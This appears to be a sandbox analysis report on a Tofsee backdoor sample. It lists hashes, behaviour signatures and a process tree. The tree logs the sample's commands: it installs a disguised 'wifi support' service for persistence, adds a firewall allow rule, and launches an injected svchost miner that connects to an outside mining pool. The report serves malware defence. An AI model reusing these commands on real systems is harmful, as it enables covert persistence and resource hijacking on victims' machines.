Overview

overview

10

Static

static

a2a4f8e26d...f7.exe

windows7_x64

10

a2a4f8e26d...f7.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-11-2020 16:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe

  • Size

    12.1MB

  • MD5

    2809f01d292e0f6cf6dbb1e1237fe0bc

  • SHA1

    11164003530c82681901facb41627295398ae78f

  • SHA256

    a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7

  • SHA512

    f12c24a726f92256544151176302fe318cfd8d20fe8719b9b5c4590e8681ed5918b674a152f00a646b1eb0fb972a250ab9eeb5616ee8c341b72e4c336724c273

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe
    "C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1160
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ledcpkzh\
      2⤵
        PID:1416
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uthjxuvn.exe" C:\Windows\SysWOW64\ledcpkzh\
        2⤵
          PID:2964
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ledcpkzh binPath= "C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe /d\"C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3416
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ledcpkzh "wifi internet conection"
            2⤵
              PID:2072
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ledcpkzh
              2⤵
                PID:3780
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2112
              • C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe
                C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe /d"C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2252
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2004
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3280

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\uthjxuvn.exe
                MD5

                6b5aacf6a1f41ab80a2019055520ebe7

                SHA1

                e60f067feeddf939551f336bc27df2efde55cbc9

                SHA256

                ab65ef811193c7e2cd4ff4ff3ce6c534b416850a80e940f4d877e816b8d3e076

                SHA512

                d78fe9ca29ff711b59632924d9ff436589c69c4b499654bb349dfbe55fb7ebea5470063994cec44f78a7b47c2e9efc8238f645cb77d8aba71fc426d35758f3cd

                Download Submit

              • C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe
                MD5

                6b5aacf6a1f41ab80a2019055520ebe7

                SHA1

                e60f067feeddf939551f336bc27df2efde55cbc9

                SHA256

                ab65ef811193c7e2cd4ff4ff3ce6c534b416850a80e940f4d877e816b8d3e076

                SHA512

                d78fe9ca29ff711b59632924d9ff436589c69c4b499654bb349dfbe55fb7ebea5470063994cec44f78a7b47c2e9efc8238f645cb77d8aba71fc426d35758f3cd

                Download Submit

              • memory/1160-0-0x0000000000839000-0x000000000083A000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1160-1-0x0000000002390000-0x0000000002391000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1416-2-0x0000000000000000-mapping.dmp

                Download

              • memory/2004-17-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2004-19-0x00000000094D0000-0x00000000098DB000-memory.dmp

                Filesize

                4.0MB

                Download

              • memory/2004-18-0x00000000036F0000-0x00000000036F5000-memory.dmp

                Filesize

                20KB

                Download

              • memory/2004-20-0x0000000003F00000-0x0000000003F07000-memory.dmp

                Filesize

                28KB

                Download

              • memory/2004-16-0x0000000002CF0000-0x0000000002CF6000-memory.dmp

                Filesize

                24KB

                Download

              • memory/2004-12-0x00000000029E0000-0x00000000029F5000-memory.dmp

                Filesize

                84KB

                Download

              • memory/2004-13-0x00000000029E9A6B-mapping.dmp

                Download

              • memory/2004-14-0x00000000029E0000-0x00000000029F5000-memory.dmp

                Filesize

                84KB

                Download

              • memory/2004-15-0x0000000004A50000-0x0000000004C5F000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/2072-6-0x0000000000000000-mapping.dmp

                Download

              • memory/2112-9-0x0000000000000000-mapping.dmp

                Download

              • memory/2252-10-0x00000000005A4000-0x00000000005A5000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2252-11-0x0000000001010000-0x0000000001011000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2964-3-0x0000000000000000-mapping.dmp

                Download

              • memory/3280-21-0x0000000002D00000-0x0000000002DF1000-memory.dmp

                Filesize

                964KB

                Download

              • memory/3280-23-0x0000000002D9259C-mapping.dmp

                Download

              • memory/3416-5-0x0000000000000000-mapping.dmp

                Download

              • memory/3780-7-0x0000000000000000-mapping.dmp

                Download